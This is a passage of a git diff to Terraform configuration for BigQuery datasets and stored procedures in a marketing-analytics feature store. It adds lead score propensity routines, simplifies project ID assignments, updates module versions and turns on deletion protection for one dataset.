local.config_bigquery.dataset.lead_score_propensity.friendly_name + project = local.lead_score_propensity_project_id + description = local.config_bigquery.dataset.lead_score_propensity.description + location = local.config_bigquery.dataset.lead_score_propensity.location + # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. + # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.feature_store.max_time_travel_hours configuration. + max_time_travel_hours = local.config_bigquery.dataset.lead_score_propensity.max_time_travel_hours # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. delete_contents_on_destroy = false @@ -92,14 +118,14 @@ resource "google_bigquery_dataset" "churn_propensity" { # This resource creates a BigQuery dataset called `customer_lifetime_value`. 
resource "google_bigquery_dataset" "customer_lifetime_value" { - dataset_id = local.config_bigquery.dataset.customer_lifetime_value.name - friendly_name = local.config_bigquery.dataset.customer_lifetime_value.friendly_name - project = null_resource.check_bigquery_api.id != "" ? local.customer_lifetime_value_project_id : local.feature_store_project_id - description = local.config_bigquery.dataset.customer_lifetime_value.description - location = local.config_bigquery.dataset.customer_lifetime_value.location + dataset_id = local.config_bigquery.dataset.customer_lifetime_value.name + friendly_name = local.config_bigquery.dataset.customer_lifetime_value.friendly_name + project = local.customer_lifetime_value_project_id + description = local.config_bigquery.dataset.customer_lifetime_value.description + location = local.config_bigquery.dataset.customer_lifetime_value.location # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.customer_lifetime_value.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.customer_lifetime_value.max_time_travel_hours + max_time_travel_hours = local.config_bigquery.dataset.customer_lifetime_value.max_time_travel_hours # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. delete_contents_on_destroy = false @@ -118,14 +144,14 @@ resource "google_bigquery_dataset" "customer_lifetime_value" { # This resource creates a BigQuery dataset called `audience_segmentation`. resource "google_bigquery_dataset" "audience_segmentation" { - dataset_id = local.config_bigquery.dataset.audience_segmentation.name - friendly_name = local.config_bigquery.dataset.audience_segmentation.friendly_name - project = null_resource.check_bigquery_api.id != "" ? local.audience_segmentation_project_id : local.feature_store_project_id - description = local.config_bigquery.dataset.audience_segmentation.description - location = local.config_bigquery.dataset.audience_segmentation.location + dataset_id = local.config_bigquery.dataset.audience_segmentation.name + friendly_name = local.config_bigquery.dataset.audience_segmentation.friendly_name + project = local.audience_segmentation_project_id + description = local.config_bigquery.dataset.audience_segmentation.description + location = local.config_bigquery.dataset.audience_segmentation.location # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.audience_segmentation.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.audience_segmentation.max_time_travel_hours + max_time_travel_hours = local.config_bigquery.dataset.audience_segmentation.max_time_travel_hours # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. 
# In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. delete_contents_on_destroy = false @@ -144,14 +170,14 @@ resource "google_bigquery_dataset" "audience_segmentation" { # This resource creates a BigQuery dataset called `auto_audience_segmentation`. resource "google_bigquery_dataset" "auto_audience_segmentation" { - dataset_id = local.config_bigquery.dataset.auto_audience_segmentation.name - friendly_name = local.config_bigquery.dataset.auto_audience_segmentation.friendly_name - project = null_resource.check_bigquery_api.id != "" ? local.auto_audience_segmentation_project_id : local.feature_store_project_id - description = local.config_bigquery.dataset.auto_audience_segmentation.description - location = local.config_bigquery.dataset.auto_audience_segmentation.location + dataset_id = local.config_bigquery.dataset.auto_audience_segmentation.name + friendly_name = local.config_bigquery.dataset.auto_audience_segmentation.friendly_name + project = local.auto_audience_segmentation_project_id + description = local.config_bigquery.dataset.auto_audience_segmentation.description + location = local.config_bigquery.dataset.auto_audience_segmentation.location # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.auto_audience_segmentation.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.auto_audience_segmentation.max_time_travel_hours + max_time_travel_hours = local.config_bigquery.dataset.auto_audience_segmentation.max_time_travel_hours # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. delete_contents_on_destroy = false @@ -200,12 +226,12 @@ locals { module "aggregated_vbb" { source = "terraform-google-modules/bigquery/google" - version = "~> 5.4" + version = "9.0.0" dataset_id = local.config_bigquery.dataset.aggregated_vbb.name dataset_name = local.config_bigquery.dataset.aggregated_vbb.friendly_name description = local.config_bigquery.dataset.aggregated_vbb.description - project_id = null_resource.check_bigquery_api.id != "" ? local.aggregated_vbb_project_id : local.feature_store_project_id + project_id = local.aggregated_vbb_project_id location = local.config_bigquery.dataset.aggregated_vbb.location # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. @@ -216,18 +242,18 @@ module "aggregated_vbb" { } tables = [for table_id in local.aggregated_vbb_tables : - { - table_id = table_id - schema = file("../../sql/schema/table/${table_id}.json") - # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. 
- # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.auto_audience_segmentation.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.aggregated_vbb.max_time_travel_hours - deletion_protection = false - time_partitioning = null, - range_partitioning = null, - expiration_time = null, - clustering = [], - labels = {}, + { + table_id = table_id + schema = file("../../sql/schema/table/${table_id}.json") + # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. + # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.auto_audience_segmentation.max_time_travel_hours configuration. + max_time_travel_hours = local.config_bigquery.dataset.aggregated_vbb.max_time_travel_hours + deletion_protection = false + time_partitioning = null, + range_partitioning = null, + expiration_time = null, + clustering = [], + labels = {}, }] } @@ -236,13 +262,13 @@ module "aggregated_vbb" { # the aggregated predictions generated by the predictions pipelines. module "aggregated_predictions" { source = "terraform-google-modules/bigquery/google" - version = "~> 5.4" + version = "9.0.0" - dataset_id = local.config_bigquery.dataset.aggregated_predictions.name - dataset_name = local.config_bigquery.dataset.aggregated_predictions.friendly_name - description = local.config_bigquery.dataset.aggregated_predictions.description - project_id = local.config_bigquery.dataset.aggregated_predictions.project_id - location = local.config_bigquery.dataset.aggregated_predictions.location + dataset_id = local.config_bigquery.dataset.aggregated_predictions.name + dataset_name = local.config_bigquery.dataset.aggregated_predictions.friendly_name + description = local.config_bigquery.dataset.aggregated_predictions.description + project_id = local.config_bigquery.dataset.aggregated_predictions.project_id + location = local.config_bigquery.dataset.aggregated_predictions.location # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to true, which means that the contents of the dataset will be deleted when the dataset is destroyed. delete_contents_on_destroy = true @@ -250,7 +276,7 @@ module "aggregated_predictions" { # The tables attribute is used to configure the BigQuery table within the dataset tables = [ { - table_id = "latest" + table_id = "latest" # The schema of the table, defined in a JSON file. schema = file("../../sql/schema/table/aggregated_predictions_latest.json") time_partitioning = null, @@ -270,7 +296,7 @@ module "aggregated_predictions" { # it failed to create resources that are already exist. 
To resolve you # need to import the the existing dataset and tables to terraform using # the following commands: -# > `terraform -chdir="${TERRAFORM_RUN_DIR}" import module.feature_store[0].module.gemini_insights.google_bigquery_dataset.main 'projects/${MAJ_FEATURE_STORE_PROJECT_ID}/datasets/gemini_insights'` +# > `terraform -chdir="${TERRAFORM_RUN_DIR}" import 'module.feature_store[0].module.gemini_insights.google_bigquery_dataset.main' 'projects/${MAJ_FEATURE_STORE_PROJECT_ID}/datasets/gemini_insights'` # # > `terraform -chdir="${TERRAFORM_RUN_DIR}" import 'module.feature_store[0].module.gemini_insights.google_bigquery_table.main["user_behaviour_revenue_insights_monthly"]' 'projects/${MAJ_FEATURE_STORE_PROJECT_ID}/datasets/gemini_insights/tables/user_behaviour_revenue_insights_monthly'` # @@ -291,35 +317,36 @@ locals { module "gemini_insights" { source = "terraform-google-modules/bigquery/google" - version = "~> 5.4" + version = "9.0.0" dataset_id = local.config_bigquery.dataset.gemini_insights.name dataset_name = local.config_bigquery.dataset.gemini_insights.friendly_name description = local.config_bigquery.dataset.gemini_insights.description - project_id = null_resource.check_bigquery_api.id != "" ? local.gemini_insights_project_id : local.feature_store_project_id + project_id = local.gemini_insights_project_id location = local.config_bigquery.dataset.gemini_insights.location # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. - delete_contents_on_destroy = true + delete_contents_on_destroy = false + deletion_protection = true dataset_labels = { - version = "prod", - dataset_id = local.config_bigquery.dataset.gemini_insights.name + version = "prod", + dataset_id = local.config_bigquery.dataset.gemini_insights.name } tables = [for table_id in local.gemini_insights_tables : - { - table_id = table_id - schema = file("../../sql/schema/table/${table_id}.json") - # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. - # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.gemini_insights.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.gemini_insights.max_time_travel_hours - deletion_protection = false - time_partitioning = null, - range_partitioning = null, - expiration_time = null, - clustering = [], - labels = {}, + { + table_id = table_id + schema = file("../../sql/schema/table/${table_id}.json") + # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. + # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.gemini_insights.max_time_travel_hours configuration. + max_time_travel_hours = local.config_bigquery.dataset.gemini_insights.max_time_travel_hours + deletion_protection = true + time_partitioning = null, + range_partitioning = null, + expiration_time = null, + clustering = [], + labels = {}, }] } @@ -330,7 +357,7 @@ resource "null_resource" "check_gemini_insights_dataset_exists" { command = <<-EOT COUNTER=0 MAX_TRIES=100 - while ! 
bq ls --filter labels.dataset_id:${local.config_bigquery.dataset.gemini_insights.name} --max_results 1 --format=json --project_id ${module.gemini_insights.project} && [ $COUNTER -lt $MAX_TRIES ] + while ! bq ls --filter labels.dataset_id:${local.config_bigquery.dataset.gemini_insights.name} --max_results 1 --format=json --project_id ${local.gemini_insights_project_id} && [ $COUNTER -lt $MAX_TRIES ] do sleep 6 printf "." @@ -347,4 +374,4 @@ resource "null_resource" "check_gemini_insights_dataset_exists" { depends_on = [ module.gemini_insights.google_bigquery_dataset ] -} \ No newline at end of file +} diff --git a/infrastructure/terraform/modules/feature-store/bigquery-procedures.tf b/infrastructure/terraform/modules/feature-store/bigquery-procedures.tf index d34ee0e2..71eabf3f 100644 --- a/infrastructure/terraform/modules/feature-store/bigquery-procedures.tf +++ b/infrastructure/terraform/modules/feature-store/bigquery-procedures.tf @@ -26,7 +26,7 @@ data "local_file" "audience_segmentation_inference_preparation_file" { # The procedure is typically invoked before running the Audience Segmentation model to ensure that the input data # is in the correct format and contains the necessary features for accurate predictions. resource "google_bigquery_routine" "audience_segmentation_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.audience_segmentation_project_id : local.feature_store_project_id + project = local.audience_segmentation_project_id dataset_id = google_bigquery_dataset.audience_segmentation.dataset_id routine_id = "audience_segmentation_inference_preparation" routine_type = "PROCEDURE" @@ -54,13 +54,13 @@ data "local_file" "aggregated_value_based_bidding_training_preparation_file" { # The procedure is typically invoked before running the Aggregated Value Based Bidding model to ensure that the input data # is in the correct format and contains the necessary features for training. resource "google_bigquery_routine" "aggregated_value_based_bidding_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.aggregated_vbb_project_id : local.feature_store_project_id - dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id - routine_id = "aggregated_value_based_bidding_training_preparation" - routine_type = "PROCEDURE" - language = "SQL" + project = local.aggregated_vbb_project_id + dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id + routine_id = "aggregated_value_based_bidding_training_preparation" + routine_type = "PROCEDURE" + language = "SQL" definition_body = data.local_file.aggregated_value_based_bidding_training_preparation_file.content - description = "Procedure that prepares features for Aggregated VBB model training." + description = "Procedure that prepares features for Aggregated VBB model training." } @@ -78,13 +78,13 @@ data "local_file" "aggregated_value_based_bidding_explanation_preparation_file" # The procedure is typically invoked before running the Aggregated Value Based Bidding model to ensure that the input data # is in the correct format and contains the necessary features for explanation. resource "google_bigquery_routine" "aggregated_value_based_bidding_explanation_preparation" { - project = null_resource.check_bigquery_api.id != "" ? 
local.aggregated_vbb_project_id : local.feature_store_project_id - dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id - routine_id = "aggregated_value_based_bidding_explanation_preparation" - routine_type = "PROCEDURE" - language = "SQL" + project = local.aggregated_vbb_project_id + dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id + routine_id = "aggregated_value_based_bidding_explanation_preparation" + routine_type = "PROCEDURE" + language = "SQL" definition_body = data.local_file.aggregated_value_based_bidding_explanation_preparation_file.content - description = "Procedure that prepares features for Aggregated VBB model explanation." + description = "Procedure that prepares features for Aggregated VBB model explanation." } # This resource reads the contents of a local SQL file named auto_audience_segmentation_inference_preparation.sql and @@ -101,7 +101,7 @@ data "local_file" "auto_audience_segmentation_inference_preparation_file" { # The procedure is typically invoked before running the Auto Audience Segmentation model to ensure that the input data # is in the correct format and contains the necessary features for prediction. resource "google_bigquery_routine" "auto_audience_segmentation_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.audience_segmentation_project_id : local.feature_store_project_id + project = local.audience_segmentation_project_id dataset_id = google_bigquery_dataset.auto_audience_segmentation.dataset_id routine_id = "auto_audience_segmentation_inference_preparation" routine_type = "PROCEDURE" @@ -128,7 +128,7 @@ data "local_file" "audience_segmentation_training_preparation_file" { # The procedure is typically invoked before running the Audience Segmentation model to ensure that the input data # is in the correct format and contains the necessary features for training. resource "google_bigquery_routine" "audience_segmentation_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.audience_segmentation_project_id : local.feature_store_project_id + project = local.audience_segmentation_project_id dataset_id = google_bigquery_dataset.audience_segmentation.dataset_id routine_id = "audience_segmentation_training_preparation" routine_type = "PROCEDURE" @@ -170,7 +170,7 @@ data "local_file" "auto_audience_segmentation_training_preparation_file" { # The procedure is typically invoked before running the Auto Audience Segmentation model to ensure that the input data # is in the correct format and contains the necessary features for training. resource "google_bigquery_routine" "auto_audience_segmentation_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.auto_audience_segmentation_project_id : local.feature_store_project_id + project = local.auto_audience_segmentation_project_id dataset_id = google_bigquery_dataset.auto_audience_segmentation.dataset_id routine_id = "auto_audience_segmentation_training_preparation" routine_type = "PROCEDURE" @@ -207,7 +207,7 @@ data "local_file" "customer_lifetime_value_inference_preparation_file" { # The procedure is typically invoked before running the Customer Lifetime Value model to ensure that the input data # is in the correct format and contains the necessary features for prediction. resource "google_bigquery_routine" "customer_lifetime_value_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? 
local.customer_lifetime_value_project_id : local.feature_store_project_id + project = local.customer_lifetime_value_project_id dataset_id = google_bigquery_dataset.customer_lifetime_value.dataset_id routine_id = "customer_lifetime_value_inference_preparation" routine_type = "PROCEDURE" @@ -233,7 +233,7 @@ data "local_file" "customer_lifetime_value_label_file" { # The procedure is typically invoked before training the Customer Lifetime Value model to ensure that the labeled data # is in the correct format and ready for training. resource "google_bigquery_routine" "customer_lifetime_value_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "customer_lifetime_value_label" routine_type = "PROCEDURE" @@ -269,7 +269,7 @@ data "local_file" "customer_lifetime_value_training_preparation_file" { # The procedure is typically invoked before training the Customer Lifetime Value model to ensure that the features data # is in the correct format and contains the necessary features for training. resource "google_bigquery_routine" "customer_lifetime_value_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.customer_lifetime_value_project_id : local.feature_store_project_id + project = local.customer_lifetime_value_project_id dataset_id = google_bigquery_dataset.customer_lifetime_value.dataset_id routine_id = "customer_lifetime_value_training_preparation" routine_type = "PROCEDURE" @@ -310,7 +310,7 @@ data "local_file" "purchase_propensity_inference_preparation_file" { # The procedure is typically invoked before prediction the Purchase Propensity model to ensure that the features data # is in the correct format and contains the necessary features for prediction. resource "google_bigquery_routine" "purchase_propensity_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.purchase_propensity_project_id : local.feature_store_project_id + project = local.purchase_propensity_project_id dataset_id = google_bigquery_dataset.purchase_propensity.dataset_id routine_id = "purchase_propensity_inference_preparation" routine_type = "PROCEDURE" @@ -336,7 +336,7 @@ data "local_file" "churn_propensity_inference_preparation_file" { # The procedure is typically invoked before prediction the Churn Propensity model to ensure that the features data # is in the correct format and contains the necessary features for prediction. resource "google_bigquery_routine" "churn_propensity_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.churn_propensity_project_id : local.feature_store_project_id + project = local.churn_propensity_project_id dataset_id = google_bigquery_dataset.churn_propensity.dataset_id routine_id = "churn_propensity_inference_preparation" routine_type = "PROCEDURE" @@ -350,6 +350,32 @@ resource "google_bigquery_routine" "churn_propensity_inference_preparation" { } } +# This resource reads the contents of a local SQL file named lead_score_propensity_inference_preparation.sql and +# stores it in a variable named lead_score_propensity_inference_preparation_file.content. +# The SQL file is expected to contain the definition of a BigQuery procedure named lead_score_propensity_inference_preparation. 
+data "local_file" "lead_score_propensity_inference_preparation_file" { + filename = "${local.sql_dir}/procedure/lead_score_propensity_inference_preparation.sql" +} + +# The lead_score_propensity_inference_preparation procedure is designed to prepare features for the Lead Score Propensity model. +# ## +# The procedure is typically invoked before prediction the Lead Score Propensity model to ensure that the features data +# is in the correct format and contains the necessary features for prediction. +resource "google_bigquery_routine" "lead_score_propensity_inference_preparation" { + project = local.lead_score_propensity_project_id + dataset_id = google_bigquery_dataset.lead_score_propensity.dataset_id + routine_id = "lead_score_propensity_inference_preparation" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.lead_score_propensity_inference_preparation_file.content + description = "Procedure that prepares features for Lead Score Propensity model inference. User-per-day granularity level features. Run this procedure every time before Lead Score Propensity model predict." + arguments { + name = "inference_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } +} + # This resource reads the contents of a local SQL file named purchase_propensity_label.sql and # stores it in a variable named purchase_propensity_label_file.content. # The SQL file is expected to contain the definition of a BigQuery procedure named purchase_propensity_label. @@ -362,7 +388,7 @@ data "local_file" "purchase_propensity_label_file" { # The procedure is typically invoked before training the Purchase Propensity model to ensure that the labeled data # is in the correct format and ready for training. resource "google_bigquery_routine" "purchase_propensity_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "purchase_propensity_label" routine_type = "PROCEDURE" @@ -398,7 +424,7 @@ data "local_file" "churn_propensity_label_file" { # The procedure is typically invoked before training the Churn Propensity model to ensure that the labeled data # is in the correct format and ready for training. resource "google_bigquery_routine" "churn_propensity_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "churn_propensity_label" routine_type = "PROCEDURE" @@ -422,6 +448,42 @@ resource "google_bigquery_routine" "churn_propensity_label" { } } +# This resource reads the contents of a local SQL file named lead_score_propensity_label.sql and +# stores it in a variable named lead_score_propensity_label_file.content. +# The SQL file is expected to contain the definition of a BigQuery procedure named lead_score_propensity_label. +data "local_file" "lead_score_propensity_label_file" { + filename = "${local.sql_dir}/procedure/lead_score_propensity_label.sql" +} + +# The lead_score_propensity_label procedure is designed to prepare label for the Lead Score Propensity model. +# ## +# The procedure is typically invoked before training the Lead Score Propensity model to ensure that the labeled data +# is in the correct format and ready for training. 
+resource "google_bigquery_routine" "lead_score_propensity_label" { + project = local.feature_store_project_id + dataset_id = google_bigquery_dataset.feature_store.dataset_id + routine_id = "lead_score_propensity_label" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.lead_score_propensity_label_file.content + description = "User-per-day granularity level labels. Run this procedure daily." + arguments { + name = "input_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } + arguments { + name = "end_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } + arguments { + name = "rows_added" + mode = "OUT" + data_type = jsonencode({ "typeKind" : "INT64" }) + } +} + # This resource reads the contents of a local SQL file named purchase_propensity_training_preparation.sql and # stores it in a variable named purchase_propensity_training_preparation_file.content. # The SQL file is expected to contain the definition of a BigQuery procedure named purchase_propensity_training_preparation. @@ -434,7 +496,7 @@ data "local_file" "purchase_propensity_training_preparation_file" { # The procedure is typically invoked before training the Purchase Propensity model to ensure that the features data # is in the correct format and contains the necessary features for training. resource "google_bigquery_routine" "purchase_propensity_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.purchase_propensity_project_id : local.feature_store_project_id + project = local.purchase_propensity_project_id dataset_id = google_bigquery_dataset.purchase_propensity.dataset_id routine_id = "purchase_propensity_training_preparation" routine_type = "PROCEDURE" @@ -463,6 +525,46 @@ resource "google_bigquery_routine" "purchase_propensity_training_preparation" { } } +# This resource reads the contents of a local SQL file named lead_score_propensity_training_preparation.sql and +# stores it in a variable named lead_score_propensity_training_preparation_file.content. +# The SQL file is expected to contain the definition of a BigQuery procedure named lead_score_propensity_training_preparation. +data "local_file" "lead_score_propensity_training_preparation_file" { + filename = "${local.sql_dir}/procedure/lead_score_propensity_training_preparation.sql" +} + +# The lead_score_propensity_training_preparation procedure is designed to prepare features for the Lead Score Propensity model. +# ## +# The procedure is typically invoked before training the Lead Score Propensity model to ensure that the features data +# is in the correct format and contains the necessary features for training. +resource "google_bigquery_routine" "lead_score_propensity_training_preparation" { + project = local.lead_score_propensity_project_id + dataset_id = google_bigquery_dataset.lead_score_propensity.dataset_id + routine_id = "lead_score_propensity_training_preparation" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.lead_score_propensity_training_preparation_file.content + description = "Procedure that prepares features for Lead Score Propensity model training. User-per-day granularity level features. Run this procedure every time before Lead Score Propensity model train." 
+ arguments { + name = "start_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } + arguments { + name = "end_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } + arguments { + name = "train_split_end_number" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "INT64" }) + } + arguments { + name = "validation_split_end_number" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "INT64" }) + } +} # This resource reads the contents of a local SQL file named churn_propensity_training_preparation.sql and # stores it in a variable named churn_propensity_training_preparation_file.content. @@ -476,7 +578,7 @@ data "local_file" "churn_propensity_training_preparation_file" { # The procedure is typically invoked before training the Churn Propensity model to ensure that the features data # is in the correct format and contains the necessary features for training. resource "google_bigquery_routine" "churn_propensity_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.churn_propensity_project_id : local.feature_store_project_id + project = local.churn_propensity_project_id dataset_id = google_bigquery_dataset.churn_propensity.dataset_id routine_id = "churn_propensity_training_preparation" routine_type = "PROCEDURE" @@ -517,7 +619,7 @@ data "local_file" "user_dimensions_file" { # The procedure is typically invoked before training the Purchase Propensity model to ensure that the features data # is in the correct format and ready for training. resource "google_bigquery_routine" "user_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_dimensions" routine_type = "PROCEDURE" @@ -553,7 +655,7 @@ data "local_file" "user_lifetime_dimensions_file" { # The procedure is typically invoked before training the Customer Lifetime Value model to ensure that the features data # is in the correct format and ready for training. resource "google_bigquery_routine" "user_lifetime_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_lifetime_dimensions" routine_type = "PROCEDURE" @@ -589,7 +691,7 @@ data "local_file" "user_lookback_metrics_file" { # The procedure is typically invoked before training the Audience Segmentation model to ensure that the features data # is in the correct format and ready for training. resource "google_bigquery_routine" "user_lookback_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_lookback_metrics" routine_type = "PROCEDURE" @@ -625,7 +727,7 @@ data "local_file" "user_rolling_window_lifetime_metrics_file" { # The procedure is typically invoked before training the Customer Lifetime Value model to ensure that the features data # is in the correct format and ready for training. resource "google_bigquery_routine" "user_rolling_window_lifetime_metrics" { - project = null_resource.check_bigquery_api.id != "" ? 
local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_rolling_window_lifetime_metrics" routine_type = "PROCEDURE" @@ -661,7 +763,7 @@ data "local_file" "user_rolling_window_metrics_file" { # The procedure is typically invoked before training the Purchase Propensity model to ensure that the features data # is in the correct format and ready for training. resource "google_bigquery_routine" "user_rolling_window_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_rolling_window_metrics" routine_type = "PROCEDURE" @@ -685,6 +787,42 @@ resource "google_bigquery_routine" "user_rolling_window_metrics" { } } +# This resource reads the contents of a local SQL file named user_rolling_window_lead_metrics.sql and +# stores it in a variable named user_rolling_window_lead_metrics_file.content. +# The SQL file is expected to contain the definition of a BigQuery procedure named user_rolling_window_lead_metrics. +data "local_file" "user_rolling_window_lead_metrics_file" { + filename = "${local.sql_dir}/procedure/user_rolling_window_lead_metrics.sql" +} + +# The user_rolling_window_lead_metrics procedure is designed to prepare the features for the Lead Score Propensity model. +# ## +# The procedure is typically invoked before training the Lead Score Propensity model to ensure that the features data +# is in the correct format and ready for training. +resource "google_bigquery_routine" "user_rolling_window_lead_metrics" { + project = local.feature_store_project_id + dataset_id = google_bigquery_dataset.feature_store.dataset_id + routine_id = "user_rolling_window_lead_metrics" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.user_rolling_window_lead_metrics_file.content + description = "User-per-day granularity level metrics. Run this procedure daily. Metrics calculated using a rolling window operation." + arguments { + name = "input_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } + arguments { + name = "end_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } + arguments { + name = "rows_added" + mode = "OUT" + data_type = jsonencode({ "typeKind" : "INT64" }) + } +} + # This resource reads the contents of a local SQL file named user_scoped_lifetime_metrics.sql data "local_file" "user_scoped_lifetime_metrics_file" { filename = "${local.sql_dir}/procedure/user_scoped_lifetime_metrics.sql" } # The user_rolling_window_metrics procedure is designed to prepare the features for the Customer Lifetime Value model. resource "google_bigquery_routine" "user_scoped_lifetime_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_scoped_lifetime_metrics" routine_type = "PROCEDURE" @@ -723,7 +861,7 @@ data "local_file" "user_scoped_metrics_file" { # The user_scoped_metrics procedure is designed to prepare the features for the Purchase Propensity model.
resource "google_bigquery_routine" "user_scoped_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_scoped_metrics" routine_type = "PROCEDURE" @@ -754,7 +892,7 @@ data "local_file" "user_scoped_segmentation_metrics_file" { # The user_scoped_segmentation_metrics procedure is designed to prepare the features for the Audience Segmentation model. resource "google_bigquery_routine" "user_scoped_segmentation_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_scoped_segmentation_metrics" routine_type = "PROCEDURE" @@ -785,7 +923,7 @@ data "local_file" "user_segmentation_dimensions_file" { # The user_segmentation_dimensions procedure is designed to prepare the features for the Audience Segmentation model. resource "google_bigquery_routine" "user_segmentation_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_segmentation_dimensions" routine_type = "PROCEDURE" @@ -816,7 +954,7 @@ data "local_file" "user_session_event_aggregated_metrics_file" { # The user_session_event_aggregated_metrics procedure is designed to prepare the features for the Purchase Propensity model. resource 